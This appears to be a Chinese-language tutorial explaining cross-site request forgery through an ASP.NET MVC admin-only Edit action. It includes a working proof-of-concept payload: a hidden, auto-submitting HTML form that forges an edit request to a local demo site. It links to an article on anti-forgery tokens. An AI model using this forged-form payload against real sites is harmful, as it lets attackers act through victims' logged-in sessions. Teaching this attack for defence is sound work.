CSRF(Cross-site request forgery)跨站請求偽造,也被稱為“One Click Attack”或者Session Riding,通常縮寫為CSRF或者XSRF,是一種對網站的惡意利用 一般被攻擊步驟: 1.登錄受信任網站A,併在本地生成Cookie。 2.在不登出A的情況 ...
CSRF(Cross-site request forgery)跨站請求偽造,也被稱為“One Click Attack”或者Session Riding,通常縮寫為CSRF或者XSRF,是一種對網站的惡意利用
一般被攻擊步驟:
1.登錄受信任網站A,併在本地生成Cookie。
2.在不登出A的情況下,訪問危險網站B。
所以沒事的時候不要亂點鏈接不是隨便說著玩的。
常見場景分析:
假設你有一個這樣的Action,因為已經加了[Authorize(Roles = "Admins")]標記,所以只有管理員角色才可以提交數據
[HttpPost] [Authorize(Roles = "Admins")] public ActionResult Edit(ProductDetails productdetails) { if (ModelState.IsValid) { db.Entry(productdetails).State = EntityState.Modified; db.SaveChanges(); return RedirectToAction("Index"); } return View(productdetails); }
非管理員訪問這個請求會被重定向到登錄頁,目前來看還是相對安全的。
那麼假設有一個管理員已經登錄了網站,就是說上面的第一步已經完成,
坐等第二步,第二步 如何實現呢,其實很簡單,
一個惡意分子 模擬了這個表單提交,並且把這個表單放到了一個惡意網站下麵,
如果上面的網站管理員碰巧點了這個鏈接(比如收到一個惡意郵件,諸如此類),惡意鏈接被點開並載入以後,
那麼這個時候上面的Edit 請求就被管理員無意識的觸發了,
第二步操作完成,攻擊成功。
<form name="csrfhackForm" method="post" action="http://localhost:63577/ProductDetails/Edit"> <input type="hidden" name="Id" value="1" /> <input type="hidden" name="LicenseCount" value="5" /> <input type="hidden" name="LicenseUsedCount" value="1" /> <input type="hidden" name="AccountUserName" value="Hacker" /> <input type="hidden" name="ProductName" value="B2B Product 101" /> </form> <script type="text/javascript"> document.csrfhackForm.submit(); </script>
http://www.devcurry.com/2013/01/what-is-antiforgerytoken-and-why-do-i.html